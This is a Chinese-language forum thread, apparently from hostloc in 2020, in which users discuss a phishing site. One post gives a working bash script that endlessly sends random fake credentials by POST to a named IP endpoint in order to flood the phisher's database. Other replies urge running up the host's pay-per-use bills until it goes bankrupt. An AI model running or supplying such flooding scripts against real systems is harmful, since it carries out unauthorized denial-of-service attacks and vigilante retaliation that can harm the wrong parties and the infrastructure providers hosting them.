嗷嗷 大佬有话说 :
这个是不是新剑皇?
本帖最后由 嗷嗷 于 2020-5-12 00:04 编辑
有个MJJ发了个钓鱼网站
https://www.hostloc.com/thread-687916-1-1.html
用的良心云香港的COS
看了一下,没有什么图片之类的,不能刷流量了,不过好像可以刷请求数?
————————————————————————————————————————
他这个钓鱼提交数据请求的是http://139.155.39.99/web/test.php
post参数是u=账号&p=密码&bianhao=1
贴一个无限提交账号密码的脚本吧,把他数据库塞满
保存为sh文件,然后执行即可,报错提示缺少什么就装什么,应该就是curl和head
或者干脆先安装一下,例【yum install -y curl head】【apt insatll -y curl head】
url="http://139.155.39.99/web/test.php"
while true
do
u=$(echo $(date +%N) | head -c $(($RANDOM%4+6)))
p=$(date +%s%N | md5sum | head -c $(($RANDOM%9+8)))
curl -X POST -d "u=$u&p=$p&bianhao=1" –connect-timeout 3 -m 6 $url
echo "账号$u密码$p已经提交"
done
账号是随机的6~9位数字
密码是随机的8~16位【英文+数字】。
tir 大佬有话说 :
看看他是按量计费,还是固定带宽
按量计费的话这个比OSS刷起来还舒服 1块钱1G,1小时破产 哈哈哈
我是大水逼 大佬有话说 :
请求数太便宜了,没意思
未完成 大佬有话说 :
学会了新的刷剑皇方法,在hostloc又学到了奇怪的技能
https://cdn.jsdelivr.net/gh/hishis/forum-master/public/images/patch.gif
zzidc 大佬有话说 :
echo "账号$u密码$p已经提交"
这个是啥账号和密码
Moriarty 大佬有话说 :
zzidc 大佬有话说 : 2020-5-12 00:06
echo "账号$u密码$p已经提交"
这个是啥账号和密码
看上面几行代码,这是随机生成的假账号密码
https://cdn.jsdelivr.net/gh/hishis/forum-master/public/images/patch.gif
riwsh 大佬有话说 :
剑皇新路子之随机帐号密码塞爆数据库
https://cdn.jsdelivr.net/gh/hishis/forum-grandmaster-for-discuz/public/images/patch.gif
ZHT5178 大佬有话说 :
可以出征了?https://cdn.jsdelivr.net/gh/hishis/forum-master/public/images/patch.gif